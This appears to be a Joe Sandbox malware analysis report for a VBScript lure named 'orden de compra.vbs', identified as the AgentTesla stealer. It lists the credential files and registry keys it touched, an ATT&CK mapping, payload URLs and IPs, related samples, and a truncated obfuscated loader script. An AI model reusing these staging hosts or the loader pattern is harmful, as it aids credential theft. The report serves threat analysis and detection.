Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	231 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	34 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	531 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	261 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
orden de compra.vbs	16%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
http://192.3.243.154/yobro.txt	0%	Avira URL Cloud	safe
http://192.3.243.154	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
ip-api.com	208.95.112.1	true	false	high
uploaddeimagens.com.br	104.21.45.138	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/gK5wA	false		high
http://192.3.243.154/yobro.txt	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/d/gK5wA;	wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000001.00000002.2120789924.000001EC00051000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br/	powershell.exe, 00000003.00000002.1777989868.000001F4047AA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/gK5wAR	wscript.exe, 00000000.00000002.1689631112.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688154539.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688844641.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688770085.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.2120789924.000001EC0006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://192.3.243.154	powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2120789924.000001EC000A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
104.21.45.138	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
192.3.243.154	unknown	United States	36352	AS-COLOCROSSINGUS	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430757
Start date and time:	2024-04-24 06:53:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	orden de compra.vbs
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winVBS@8/6@3/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 13 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2656 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: orden de compra.vbs

Simulations

Behavior and APIs

Time	Type	Description
06:54:10	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	G4-TODOS.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	ip-api.com/line/?fields=hosting
	X1.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	ip-api.com/line/?fields=hosting
	X2.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
104.21.45.138	gmb.xls	Get hash	malicious	Unknown	Browse
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse
	F723838674.vbs	Get hash	malicious	Remcos	Browse
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse
	Remittance slip.vbs	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
104.21.84.67	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	G4-TODOS.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	208.95.112.1
	X1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	208.95.112.1
	X2.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
paste.ee	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	New order-Docs0374.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	gmb.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	72625413524.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	mWimHae6l9.exe	Get hash	malicious	Unknown	Browse	172.67.187.200
	UmJMWJPQ9h.exe	Get hash	malicious	XWorm	Browse	172.67.187.200
	GPgMeqI8Gy.exe	Get hash	malicious	XWorm	Browse	104.21.84.67
	E3XzKxHCCb.exe	Get hash	malicious	XWorm	Browse	172.67.187.200
uploaddeimagens.com.br	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	gmb.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	72625413524.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138
	F723838674.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	shipping docs.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	Invoice.doc	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	Pedido02304024.vbs	Get hash	malicious	FormBook, GuLoader	Browse	172.67.152.117
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	PO 23JC0704-Rollease-B.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
TUT-ASUS	G4-TODOS.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	208.95.112.1
	X1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	208.95.112.1
	X2.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
AS-COLOCROSSINGUS	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.95.60.77
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	107.175.229.143
	Comprobante.xlam.xlsx	Get hash	malicious	GuLoader	Browse	23.95.60.77
	Gam.xls	Get hash	malicious	Unknown	Browse	23.94.36.10
	Quotation.xls	Get hash	malicious	Remcos	Browse	107.175.229.143
	Gam.xls	Get hash	malicious	Unknown	Browse	23.94.36.10
	Gam.xls	Get hash	malicious	Unknown	Browse	23.94.36.10
	https://39.104-168-101-28.cprapid.com/Pay-PaI/	Get hash	malicious	PayPal Phisher	Browse	104.168.101.28
CLOUDFLARENETUS	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	shipping docs.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	Invoice.doc	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	Pedido02304024.vbs	Get hash	malicious	FormBook, GuLoader	Browse	172.67.152.117
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	PO 23JC0704-Rollease-B.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	104.21.45.138
	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.45.138
	G4-TODOS.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.45.138
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	PO 23JC0704-Rollease-B.exe	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	3Shape Unite Installer.exe	Get hash	malicious	Unknown	Browse	104.21.45.138
	ScreenConnect.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.45.138
	ScreenConnect.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.45.138
	X1.exe	Get hash	malicious	XWorm	Browse	104.21.45.138
37f463bf4616ecd445d4a1937da06e19	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	104.21.84.67
	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	G4-TODOS.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk	Get hash	malicious	Unknown	Browse	104.21.84.67
	181_960.msi	Get hash	malicious	Unknown	Browse	104.21.84.67
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.84.67
	3CB27VUHRg.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.84.67
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.84.67
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.84.67

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11321), with CRLF line terminators
Category:	dropped
Size (bytes):	13321
Entropy (8bit):	4.757138809018796
Encrypted:	false
SSDEEP:	384:elVPAlVQjDwtxjr77JXm49fM3FSzgB2zJ/8opceTUBLOoVHQQxwJ15hG5uH+Q:rV6DSJjW3FdfbOoJQQxC1V
MD5:	C76D5A688D1FE9AE9B6507C61552D4FA
SHA1:	0296CD21E1CE9FB858216E74F2200A0EEB2A32F5
SHA-256:	C93CC77D702A91E58F00CF0B9B6E0DF744E411B0E3AD0D5074151163CDC02FE2
SHA-512:	328FC1E9A56607938690EACE8EE678AC66E43495671D9FF4AEA50A04306728D2DA54CF0B2FECC04307CD9CBCCEB1B13A8A7B02FE17F1473ACDA95734DBCF6D52
Malicious:	false
Reputation:	low
Preview:	.. dim pitheco , achavascado , enterrar , bexigal , excursar , Cama , excursar1.. achavascado = " ".. enterrar = "" & bexigal & achavascado & bexigal & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & bexigal & achavascado & bexigal & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & bexigal & achavascado & bexigal & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & bexigal & achavascado & bexigal & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & bexigal & achavascado & bexigal & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & bexigal & achavascado & bexigal & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & bexigal & ac

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulf66llp:NllUSOl
MD5:	B798C92691636A7830BE142C313C0E72
SHA1:	53C2A97D145573705355A8C39757DB8009D116CC
SHA-256:	5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
